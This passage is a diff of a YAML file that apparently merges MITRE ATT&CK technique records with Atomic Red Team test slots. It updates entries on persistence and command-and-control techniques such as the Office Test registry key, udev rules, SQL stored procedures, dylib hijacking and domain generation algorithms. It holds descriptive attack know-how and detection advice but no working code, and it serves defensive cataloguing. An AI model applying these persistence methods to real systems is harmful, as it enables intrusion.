-      modified: '2024-04-16T12:41:55.175Z'
+      modified: '2024-10-15T16:01:48.325Z'
       name: 'Office Application Startup: Office Test'
       description: |-
         Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)
@@ -35528,8 +35906,8 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Office 365
-      x_mitre_version: '1.2'
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'Command: Command Execution'
@@ -35559,7 +35937,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1137.002
     atomic_tests: []
   T1547.008:
@@ -35602,7 +35979,7 @@ persistence:
         Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
 
         Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:34:43.405Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Autostart Execution: LSASS Driver'
       x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
@@ -35627,12 +36004,11 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.008
     atomic_tests: []
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -35672,8 +36048,10 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -35681,13 +36059,13 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -35718,9 +36096,6 @@ persistence:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests:
     - name: Creating GCP Service Account and Service Account Key
@@ -35783,10 +36158,10 @@ persistence:
           '
   T1053.002:
     technique:
-      modified: '2023-11-15T14:38:10.876Z'
+      modified: '2024-10-12T15:53:12.333Z'
       name: 'Scheduled Task/Job: At'
       description: |-
-        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
 
         On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the <code>at.allow</code> file. If the <code>at.allow</code> file does not exist, the <code>at.deny</code> file is checked. Every username not listed in <code>at.deny</code> is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the <code>at.deny</code> exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
 
@@ -35849,7 +36224,7 @@ persistence:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Scheduled Job: Scheduled Job Creation'
@@ -35883,8 +36258,8 @@ persistence:
         url: https://man7.org/linux/man-pages/man1/at.1p.html
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Microsoft Scheduled Task Events Win10
         description: Microsoft. (2017, May 28). Audit Other Object Access Events.
           Retrieved June 27, 2019.
@@ -35893,6 +36268,10 @@ persistence:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Malicious Life by Cybereason
+        description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+          the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+        url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -35905,12 +36284,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.002
     atomic_tests: []
   T1556:
     technique:
-      modified: '2024-04-11T21:51:44.851Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Modify Authentication Process
       description: |-
         Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -35923,6 +36301,7 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Chris Ross @xorrior
       x_mitre_deprecated: false
@@ -35959,17 +36338,17 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - Network
-      - Azure AD
-      - Google Workspace
       - IaaS
-      - Office 365
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Process: Process Access'
@@ -36015,9 +36394,65 @@ persistence:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+    atomic_tests: []
+  T1546.017:
+    technique:
+      modified: '2024-11-11T19:05:38.708Z'
+      name: Udev Rules
+      description: |-
+        Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
+        Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Eduardo González Hernández (@codexlynx)
+      - Eder Pérez Ignacio, @ch4ik0
+      - Wirapong Petshagun
+      - "@grahamhelton3"
+      - Ruben Groenewoud, Elastic
+      x_mitre_deprecated: false
+      x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+        in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+        specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+        2024) '
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'File: File Modification'
+      type: attack-pattern
+      id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+      created: '2024-09-26T17:02:09.888Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/017
+        external_id: T1546.017
+      - source_name: Ignacio Udev research 2024
+        description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+          persistence. Retrieved September 26, 2024.
+        url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+      - source_name: Elastic Linux Persistence 2024
+        description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+          -  A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+        url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+      - source_name: Reichert aon sedexp 2024
+        description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+          Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+        url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.007:
     technique:
@@ -36054,7 +36489,7 @@ persistence:
         Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at <code>HKLM\SOFTWARE\Microsoft\Netsh</code>.
 
         Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:09:17.363Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Netsh Helper DLL'
       x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
@@ -36078,51 +36513,11 @@ persistence:
       - SYSTEM
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.007
     atomic_tests: []
   T1505.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Carlos Borges, @huntingneo, CIP
-      - Lucas da Silva Pereira, @vulcanunsec, CIP
-      - Kaspersky
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
-      type: attack-pattern
-      created: '2019-12-12T14:59:58.168Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1505.001
-        url: https://attack.mitre.org/techniques/T1505/001
-      - source_name: NetSPI Startup Stored Procedures
-        url: https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/
-        description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
-          SQL Server – Part 1: Startup Stored Procedures. Retrieved July 8, 2019.'
-      - source_name: Kaspersky MSSQL Aug 2019
-        url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
-        description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
-          attack on Microsoft SQL Server. Retrieved September 4, 2019.'
-      - source_name: Microsoft xp_cmdshell 2017
-        url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
-        description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
-          September 9, 2019.
-      - source_name: Microsoft CLR Integration 2017
-        url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
-        description: Microsoft. (2017, June 19). Common Language Runtime Integration.
-          Retrieved July 8, 2019.
-      - source_name: NetSPI SQL Server CLR
-        url: https://blog.netspi.com/attacking-sql-server-clr-assemblies/
-        description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
-          Retrieved July 8, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-10-15T16:05:24.007Z'
       name: SQL Stored Procedures
       description: "Adversaries may abuse SQL stored procedures to establish persistent
         access to systems. SQL Stored Procedures are code that can be saved and reused
@@ -36145,20 +36540,57 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Carlos Borges, @huntingneo, CIP
+      - Lucas da Silva Pereira, @vulcanunsec, CIP
+      - Kaspersky
+      x_mitre_deprecated: false
       x_mitre_detection: 'On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation:
         NetSPI Startup Stored Procedures) Consider enabling audit features that can
         log malicious startup activities.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
+      created: '2019-12-12T14:59:58.168Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1505/001
+        external_id: T1505.001
+      - source_name: Microsoft CLR Integration 2017
+        description: Microsoft. (2017, June 19). Common Language Runtime Integration.
+          Retrieved July 8, 2019.
+        url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
+      - source_name: Microsoft xp_cmdshell 2017
+        description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
+          September 9, 2019.
+        url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
+      - source_name: Kaspersky MSSQL Aug 2019
+        description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
+          attack on Microsoft SQL Server. Retrieved September 4, 2019.'
+        url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
+      - source_name: NetSPI Startup Stored Procedures
+        description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
+          SQL Server – Part 1: Startup Stored Procedures. Retrieved September 12,
+          2024.'
+        url: https://www.netspi.com/blog/technical-blog/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
+      - source_name: NetSPI SQL Server CLR
+        description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
+          Retrieved September 12, 2024.
+        url: https://www.netspi.com/blog/technical-blog/adversary-simulation/attacking-sql-server-clr-assemblies/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1556.004:
     technique:
@@ -36188,7 +36620,7 @@ persistence:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-12-14T23:14:26.107Z'
       name: Network Device Authentication
       description: |-
         Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -36212,12 +36644,10 @@ persistence:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.004:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:39.601Z'
       name: Dylib Hijacking
       description: |-
         Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -36301,11 +36731,10 @@ persistence:
         url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -36357,9 +36786,8 @@ persistence:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests: []
   T1574.012:
@@ -36408,7 +36836,7 @@ persistence:
         url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
         description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
           Profilers. Retrieved June 24, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T21:35:12.049Z'
       name: 'Hijack Execution Flow: COR_PROFILER'
       description: |-
         Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -36446,14 +36874,12 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1574.012
     atomic_tests: []
 command-and-control:
   T1205.002:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-20T19:56:18.579Z'
       name: Socket Filters
       description: |-
         Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -36516,7 +36942,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1132.001:
     technique:
@@ -36574,97 +36999,95 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1132.001
     atomic_tests: []
   T1568.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T15:55:16.111Z'
+      name: Domain Generation Algorithms
+      description: |-
+        Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
+
+        DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
+
+        Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: command-and-control
       x_mitre_contributors:
       - Ryan Benson, Exabeam
       - Barry Shteiman, Exabeam
       - Sylvain Gil, Exabeam
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
+
+        Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Flow'
       type: attack-pattern
+      id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
       created: '2020-03-10T17:44:59.787Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1568.002
         url: https://attack.mitre.org/techniques/T1568/002
-      - source_name: Cybereason Dissecting DGAs
-        url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
-        description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
-          Eight Real World DGA Variants. Retrieved February 18, 2019.'
-      - source_name: Cisco Umbrella DGA
-        url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
-        description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
-          Why so effective?. Retrieved February 18, 2019.
-      - source_name: Unit 42 DGA Feb 2019
-        url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
-        description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
-          Generation Algorithms (DGA). Retrieved February 19, 2019.'
-      - url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+        external_id: T1568.002
+      - source_name: Elastic Predicting DGA
+        description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
+          2). Predicting Domain Generation Algorithms with Long Short-Term Memory
+          Networks. Retrieved April 26, 2019.
+        url: https://arxiv.org/pdf/1611.00791.pdf
+      - source_name: Talos CCleanup 2017
         description: 'Brumaghin, E. et al. (2017, September 18). CCleanup: A Vast
           Number of Machines at Risk. Retrieved March 9, 2018.'
-        source_name: Talos CCleanup 2017
-      - source_name: Akamai DGA Mitigation
-        url: https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html
-        description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
-          Domain Generation Algorithms. Retrieved February 18, 2019.
-      - url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
+        url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+      - source_name: Pace University Detecting DGA May 2017
+        description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
+          Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
+          April 26, 2019.
+        url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
+      - source_name: FireEye POSHSPY April 2017
         description: Dunwoody, M.. (2017, April 3). Dissecting One of APT29’s Fileless
           WMI and PowerShell Backdoors (POSHSPY). Retrieved April 5, 2017.
-        source_name: FireEye POSHSPY April 2017
+        url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
       - source_name: ESET Sednit 2017 Activity
-        url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
         description: 'ESET. (2017, December 21). Sednit update: How Fancy Bear Spent
           the Year. Retrieved February 18, 2019.'
+        url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
       - source_name: Data Driven Security DGA
-        url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
         description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
           2, Feature Engineering. Retrieved February 18, 2019.'
-      - source_name: Pace University Detecting DGA May 2017
